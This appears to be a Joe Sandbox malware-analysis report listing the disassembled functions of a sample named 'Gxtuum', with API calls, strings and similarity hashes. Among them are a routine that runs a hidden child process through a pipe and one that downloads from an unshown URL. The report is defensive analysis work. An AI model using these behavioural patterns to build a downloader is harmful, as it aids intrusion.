GetLocaleInfoW.KERNEL32(?,20001004,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D64
GetACP.KERNEL32(?,?,00122FC0,?,00000000), ref: 00122D79

Strings

OCP, xrefs: 00122CF6
ACP, xrefs: 00122CC0

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
Instruction ID: 79147b9964d36a45b27890066eb72939872cd3436922da64e5e6cf33a6a9d020
Opcode Fuzzy Hash: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
Instruction Fuzzy Hash: 8A21C532600128BBD7398FA4E900BDF73A6FF50B60B5A8164E90ADB215E772DD61C750

Function 00122E77 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001171C0: GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263

Part of subcall function 001171C0: _free.LIBCMT ref: 00117222
Part of subcall function 001171C0: _free.LIBCMT ref: 00117258

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00122F83
IsValidCodePage.KERNEL32(00000000), ref: 00122FCC
IsValidLocale.KERNEL32(?,00000001), ref: 00122FDB
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00123023
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00123042

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: f2a5cfcce9969cd3d92990cfde818362dc2c51c29dd29654211c1068d06047c8
Instruction ID: 06cf2b9bdd7f5b03b7123ffc4bd472728ca51fb3fd3a0752b21b399309770482
Opcode Fuzzy Hash: f2a5cfcce9969cd3d92990cfde818362dc2c51c29dd29654211c1068d06047c8
Instruction Fuzzy Hash: 2B51AF71A00225BFDB20EFA4ED41AFEB7B8BF18700F190429F900E7190E7B09964CB61

Function 0010A895 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0010A8A1
IsDebuggerPresent.KERNEL32 ref: 0010A96D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0010A98D
UnhandledExceptionFilter.KERNEL32(?), ref: 0010A997

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0e2519d75be9ce4dabfc679de6602e8af5b1c55459907b55d75747a3765c0730
Instruction ID: 921b209c6bde3662dd67bc18a67481e3f792c1df94e1fd634f04693d8104e4df
Opcode Fuzzy Hash: 0e2519d75be9ce4dabfc679de6602e8af5b1c55459907b55d75747a3765c0730
Instruction Fuzzy Hash: E2312775E05318DBDB20DFA0D9897CDBBB8BF18304F1041AAE44DAB290EBB05A85CF45

Function 001097DD Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001097E3
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001097F1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00109802
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00109813
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00109824
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00109835
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00109846
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00109857
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00109868
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00109879
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0010988A
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0010989B
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001098AC
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001098BD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001098CE
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001098DF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001098F0
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00109901
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00109912
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00109923
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00109934
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00109945
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00109956
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00109967
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00109978
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00109989
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0010999A
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001099AB
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001099BC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001099CD
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001099DE
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001099EF
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00109A00
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00109A11
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00109A22
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00109A33
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00109A44
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00109A55
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00109A66
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00109A77
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00109A88

Strings

GetCurrentProcessorNumber, xrefs: 00109918
SubmitThreadpoolWork, xrefs: 00109A39
SetFileInformationByHandle, xrefs: 0010996D
kernel32.dll, xrefs: 001097DE
AcquireSRWLockExclusive, xrefs: 001099E4
TryAcquireSRWLockExclusive, xrefs: 001099F5
CloseThreadpoolTimer, xrefs: 001098B2
FlushProcessWriteBuffers, xrefs: 001098F6
CreateThreadpoolTimer, xrefs: 0010987F
GetTickCount64, xrefs: 0010994B
SetThreadpoolWait, xrefs: 001098D4
ReleaseSRWLockExclusive, xrefs: 00109A06
WakeAllConditionVariable, xrefs: 001099B1
FlsAlloc, xrefs: 001097EB
CreateThreadpoolWait, xrefs: 001098C3
FlsGetValue, xrefs: 00109808
GetCurrentPackageId, xrefs: 0010993A
InitializeConditionVariable, xrefs: 0010998F
CreateSemaphoreExW, xrefs: 0010986E
InitOnceExecuteOnce, xrefs: 0010983B
CreateEventExW, xrefs: 0010984C
GetSystemTimePreciseAsFileTime, xrefs: 0010997E
GetLocaleInfoEx, xrefs: 00109A6C
SleepConditionVariableCS, xrefs: 001099C2
InitializeCriticalSectionEx, xrefs: 0010982A
FlsSetValue, xrefs: 00109819
FreeLibraryWhenCallbackReturns, xrefs: 00109907
CloseThreadpoolWait, xrefs: 001098E5
CompareStringEx, xrefs: 00109A5B
WakeConditionVariable, xrefs: 001099A0
SleepConditionVariableSRW, xrefs: 00109A17
GetFileInformationByHandleEx, xrefs: 0010995C
CreateSymbolicLinkW, xrefs: 0010992E
CreateThreadpoolWork, xrefs: 00109A28
InitializeSRWLock, xrefs: 001099D3
SetThreadpoolTimer, xrefs: 00109890
CreateSemaphoreW, xrefs: 0010985D
WaitForThreadpoolTimerCallbacks, xrefs: 001098A1
LCMapStringEx, xrefs: 00109A7D
CloseThreadpoolWork, xrefs: 00109A4A
FlsFree, xrefs: 001097F7

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
Instruction ID: 14dd56a4a91128b5906b7de6fe3bc2ec9e5ac023324abe6c6bb687b91c1803af
Opcode Fuzzy Hash: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
Instruction Fuzzy Hash: 45618AB5956360BFCB087FB5BD0EA5A3EA8BF0A746724441AF901E2974DBF441C08F64

Function 000E8280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000080,?), ref: 000E832D
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 000E8403
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 000E8415
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 000E8459
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 000E8481
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 000E848F
WaitForSingleObject.KERNEL32(?,00000064), ref: 000E84B8
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84DA
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84FE
ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 000E8525
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E856A
CloseHandle.KERNEL32(?), ref: 000E8581
CloseHandle.KERNEL32(?), ref: 000E8589
CloseHandle.KERNEL32(00000000), ref: 000E8591
CloseHandle.KERNEL32(00000000), ref: 000E8599
GetLastError.KERNEL32 ref: 000E85A3

Strings

D, xrefs: 000E83BC

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
String ID: D
API String ID: 3215130363-2746444292
Opcode ID: 8f2d7a1b34058070569b5584a39bca56294f8c1c7939f34368142c12425f2cd4
Instruction ID: c26561b2ae39208339ffe200facd5424d09fb0f9e458889925e590a259393ae1
Opcode Fuzzy Hash: 8f2d7a1b34058070569b5584a39bca56294f8c1c7939f34368142c12425f2cd4
Instruction Fuzzy Hash: C4A18E71A40268AFEB24DF60CC46BDDB7B9AF04700F1041E5EA09B61D0DBB5AE84CF90

Function 0012047F Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001204A9
_free.LIBCMT ref: 00120582
_free.LIBCMT ref: 001205AF

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: ab5cd1051db6f82740556edfd785584a1a13776e2c3b7c471fee66df5623e2bc
Instruction ID: 5f582b872ce368bb03235f59cefe588a8e44016dd4693828437349844eaec36e
Opcode Fuzzy Hash: ab5cd1051db6f82740556edfd785584a1a13776e2c3b7c471fee66df5623e2bc
Instruction Fuzzy Hash: 9BD11A71D00325AFDB26AF74AC81AAE77E4EF59310F05436DF94497283EB7199A0CB90

Function 00112E53 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00112EC2
_free.LIBCMT ref: 00112ED8
_free.LIBCMT ref: 00112EEB
_free.LIBCMT ref: 00112F00
_free.LIBCMT ref: 00112F15
GetCPInfo.KERNEL32(?,?), ref: 00112F5F

Part of subcall function 0011C573: _free.LIBCMT ref: 0011C5DE

_free.LIBCMT ref: 001131CA
_free.LIBCMT ref: 001131DD
_free.LIBCMT ref: 001131EB
_free.LIBCMT ref: 001131F6
_free.LIBCMT ref: 00113238
_free.LIBCMT ref: 00113240
_free.LIBCMT ref: 00113246
_free.LIBCMT ref: 0011324E
_free.LIBCMT ref: 0011325C

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: b5fffb88562af4f990bf7125c4f59cfbf6a228aad7c21eff9b2312cbbead20f5
Instruction ID: 1f3dbe7c60fb617b98a3d086d13da9e15682adaf4d3f112a03b17462bb5df430
Opcode Fuzzy Hash: b5fffb88562af4f990bf7125c4f59cfbf6a228aad7c21eff9b2312cbbead20f5
Instruction Fuzzy Hash: 69D18D71D003459FDB25DFA8C881BEEBBF5FF58310F144139E4A9A7292DB70A9858B60

Function 00109DEA Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00148FA8,00000FA0,?,?,00109DC8), ref: 00109DF6
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00109DC8), ref: 00109E01
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00109DC8), ref: 00109E12
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00109E24
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00109E32
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00109DC8), ref: 00109E55
DeleteCriticalSection.KERNEL32(00148FA8,00000007,?,?,00109DC8), ref: 00109E71
CloseHandle.KERNEL32(00000000,?,?,00109DC8), ref: 00109E81

Strings

WakeAllConditionVariable, xrefs: 00109E2A
SleepConditionVariableCS, xrefs: 00109E1E
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00109DFC
kernel32.dll, xrefs: 00109E0D

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
Instruction ID: b600d90773ea8beaee927d555b28179f0e655fbb4fc11b7b06190186fc3fb330
Opcode Fuzzy Hash: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
Instruction Fuzzy Hash: 6001DF74645311BBDB21AB74BC19A2B3A69BF85B91B140014FC40D6AE4DFB0CC808660

Function 00121AFD Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00121B41

Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E14
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E26
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E38
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E4A
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E5C
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E6E
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E80
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E92
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EA4
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EB6
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EC8
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EDA
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EEC

_free.LIBCMT ref: 00121B36

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 00121B58
_free.LIBCMT ref: 00121B6D
_free.LIBCMT ref: 00121B78
_free.LIBCMT ref: 00121B9A
_free.LIBCMT ref: 00121BAD
_free.LIBCMT ref: 00121BBB
_free.LIBCMT ref: 00121BC6
_free.LIBCMT ref: 00121BFE
_free.LIBCMT ref: 00121C05
_free.LIBCMT ref: 00121C22
_free.LIBCMT ref: 00121C3A

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
Instruction ID: 41af9672aae356a2cfb073c7078c1b5b747fc7a6acefbacbe4211ace791769d6
Opcode Fuzzy Hash: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
Instruction Fuzzy Hash: 85314C32600311AFEB35EA78EC45F96B7FAEF60350F148829E059E7151EF70E9A08724

Function 00120EF5 Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00120F3D
_free.LIBCMT ref: 00120F61
_free.LIBCMT ref: 00120F6E
_free.LIBCMT ref: 00120F93
_free.LIBCMT ref: 00120FA0
_free.LIBCMT ref: 00120FA9
_free.LIBCMT ref: 00121283
_free.LIBCMT ref: 0012128B

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
Instruction ID: 55d3c87de21f2f8ea26c17e8f8e431f15491539c8e4512faa531a8b4f69fdf75
Opcode Fuzzy Hash: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
Instruction Fuzzy Hash: ADC18772E40214BFDB64DBA8CC82FEE77F99B19710F544065FA04FB282D770A98097A4

Function 0011B91D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0011BBBE, 0011BBC3

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 8372ea036297aac7f3bae68546b8f9b3b7741f48f3653e7f892e930478aaac5b
Instruction ID: 0b8ae7d2805acd4d8c5e7f9c80e5f8f35df12507d3c9a783d4a4edb020361d86
Opcode Fuzzy Hash: 8372ea036297aac7f3bae68546b8f9b3b7741f48f3653e7f892e930478aaac5b
Instruction Fuzzy Hash: 02C1D170A0C245AFDB19DFA8C8C1BEEBBB0BF59310F144069F5459B2A2CB7199C1CB61

Function 0010D112 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0010D20F
type_info::operator==.LIBVCRUNTIME ref: 0010D231
___TypeMatch.LIBVCRUNTIME ref: 0010D340
IsInExceptionSpec.LIBVCRUNTIME ref: 0010D412
_UnwindNestedFrames.LIBCMT ref: 0010D496
CallUnexpected.LIBVCRUNTIME ref: 0010D4B1

Strings

csm, xrefs: 0010D14F
csm, xrefs: 0010D1BC
csm, xrefs: 0010D268

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 8ef6bc6a15d097799f024e362630a78ed53ac625baf4c016e333d8be8ab53459
Instruction ID: 58cc018d26f082863fe0b905d2c9232b69031924c6fe9a4b4604562c711a6c4b
Opcode Fuzzy Hash: 8ef6bc6a15d097799f024e362630a78ed53ac625baf4c016e333d8be8ab53459
Instruction Fuzzy Hash: 9EB19D71800209EFCF18DFE4E8819AEBBB5FF14310B144169F895AB696D7B0EA51CF91

Function 000FCCB8 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 236networksleepfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0013CE7B,00000000,00000000,00000000,00000000), ref: 000FCD5F
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000FCD7C
InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 000FCD90
InternetCloseHandle.WININET(00000000), ref: 000FCD9B
InternetCloseHandle.WININET(?), ref: 000FCDA0
Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 000FCDF9

Strings

246122658369, xrefs: 000FCE30
2LE=, xrefs: 000FCE16
Ph, xrefs: 000FCE49

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

